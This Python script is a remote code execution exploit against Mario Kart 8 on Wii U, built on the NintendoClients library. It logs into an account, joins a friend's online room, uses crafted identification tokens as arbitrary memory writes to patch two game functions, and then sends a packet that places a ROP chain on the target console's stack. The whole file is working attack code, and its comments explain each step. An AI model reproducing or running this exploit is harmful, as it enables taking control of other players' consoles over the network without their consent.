from nintendo.nex import backend, authentication, matchmaking from nintendo.pia.station import IdentificationInfo from nintendo.pia.session import PIASession from nintendo.account import AccountAPI from nintendo.games import MK8 import struct import time import logging # logging.basicConfig(level=logging.DEBUG) def runExploit(DEVICE_ID, SERIAL_NUMBER, SYSTEM_VERSION, REGION, COUNTRY, USERNAME, PASSWORD, FRIEND_NAME, rop_chain): # A packet may contain more than 1000 bytes, # enough room to build a nice ROP chain rop_payload_start = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, ] rop_payload = rop_payload_start + rop_chain # for i in range(len(rop_payload)): # print("%3d: %08X" % (i, rop_payload[i])) # Log in on account server api = AccountAPI() api.set_device(DEVICE_ID, SERIAL_NUMBER, SYSTEM_VERSION, REGION, COUNTRY) api.set_title(MK8.TITLE_ID_EUR, MK8.LATEST_VERSION) api.login(USERNAME, PASSWORD) my_pid = api.get_pid(USERNAME) friend_pid = api.get_pid(FRIEND_NAME) mii_name = api.get_mii(my_pid).name # Connect to game server nex_token = api.get_nex_token(MK8.GAME_SERVER_ID) mybackend = backend.BackEndClient(MK8.ACCESS_KEY, MK8.NEX_VERSION) mybackend.connect(nex_token.host, nex_token.port) mybackend.login( nex_token.username, nex_token.password ) matchmake_ext = matchmaking.MatchmakeExtensionClient(mybackend) # 0x387E0A1C - 0x387E0640 # Find friend room playing_sessions = matchmake_ext.get_playing_session([friend_pid]) if not playing_sessions: raise RuntimeError("Couldn't find friend room for %s" % FRIEND_NAME) gathering = playing_sessions[0].gathering # Request session key (for p2p) session_key = matchmake_ext.join_matchmake_session( gathering.id, "This is NintendoClients" ) matchmaker = matchmaking.MatchMakingClient(mybackend) session_urls = matchmaker.get_session_urls(gathering.id) # Constructs an indentification token that writes # an arbitrary value at an arbitrary address # Constructs an indentification token that writes # an arbitrary value at an arbitrary address def write(addr, value): func = 0xE8A26D4 dummy = 0xAAAAAAAA strbuf = 0x386043D8 vtable = 0x386042D4 return struct.pack( ">IIIIIIII", addr - 0xC, func, dummy, dummy, strbuf, vtable, dummy, value ) # The ability to write an arbitrary value at an arbitrary address is # a powerful tool. It's easy to patch a virtual function for example: # you simply need to overwrite its function pointer in its vtable. # I'll briefly explain how this exploit turns this into a ROP chain. # # Md5Context::GetHashSize is called when the console checks the signature # of an incoming packet, and when it appends a signature to an outgoing # packet. Although GetHashSize doesn't take any parameters, r4 always # contains the content of the packet when it is called, and r5 contains # the size of the packet. This exploit redirects Md5Context::GetHashSize # to the following piece of code: # ... # addi r3, r1, 8 # bl memcpy # ... # The next packet we send to the console after patching Md5Context::GetHashSize # will be copied onto the stack, and the ROP chain starts as soon as # Md5Context::GetHashSize returns. # # There are two issues with this approach: # - The console may try to send a packet before it receives our ROP packet # - The console might receive a packet from someone else before it receives # our ROP packet # Both cases cause a normal packet to be copied onto the stack and crash # the console. This exploit works around the first issue by patching # StationPacketHandler::AssignPacket to always return 0. This stops the # console from trying to send any packets. The second issue is the reason # that this exploit only works when there are no other players in the # friend room. injections = [ (0x1066f9b8, 0xEBC0314), # StationPacketHandler::AssignPacket -> return 0 (0x1066889c, 0xEBE6624) # Md5Context::GetHashSize -> memcpy on stack ] # Create a packet with a valid header but whose body contains a ROP chain rop_packet = b"\x32\xAB\x98\x64\x01\x00\x00\x00" rop_packet += struct.pack(">%iI" % len(rop_payload), *rop_payload) # Initialize P2P session session = PIASession(mybackend, session_key) session.start( write(*injections[0]), # Identification token that performs the first injection mii_name ) # Because we won't receive any packets from the console after patching # StationPacketHandler::AssignPacket, we need to guess what the console # expects. # Send a packet that 'expects' an acknowlegement # but don't wait for the acknowlegement def send_with_ack(station, message): ack_id = next(session.resending_transport.ack_id) & 0xFFFFFFFF message.payload += struct.pack(">I", ack_id) session.transport.send(station, message) # Connect to session host host = session.connect_to_host(session_urls) session.resending_transport.send = send_with_ack session.mesh_protocol.send_join_request(host) # First injection time.sleep(1) # Wait for join response # Replace identification token for second memory injection session.station.identification_info = \ IdentificationInfo(write(*injections[1]), mii_name) # From now on we won't receive any packets from the console so # we have to do things manually. # Disconnect and reconnect to host session.station_protocol.send_disconnection_request(host) session.station_protocol.send_connection_request(host) time.sleep(0.1) ack_id = next(session.resending_transport.ack_id) & 0xFFFFFFFF session.station_protocol.send_ack(host, struct.pack(">I", ack_id)) session.station_protocol.send_connection_response(host) time.sleep(0.1) ack_id = next(session.resending_transport.ack_id) & 0xFFFFFFFF session.station_protocol.send_ack(host, struct.pack(">I", ack_id)) time.sleep(1) # Send join request, performing the second memory injection session.mesh_protocol.send_join_request(host) time.sleep(1) # Finally, send packet with ROP chain session.transport.transport.socket.send(rop_packet, host.address) # Disconnect from game server mybackend.close()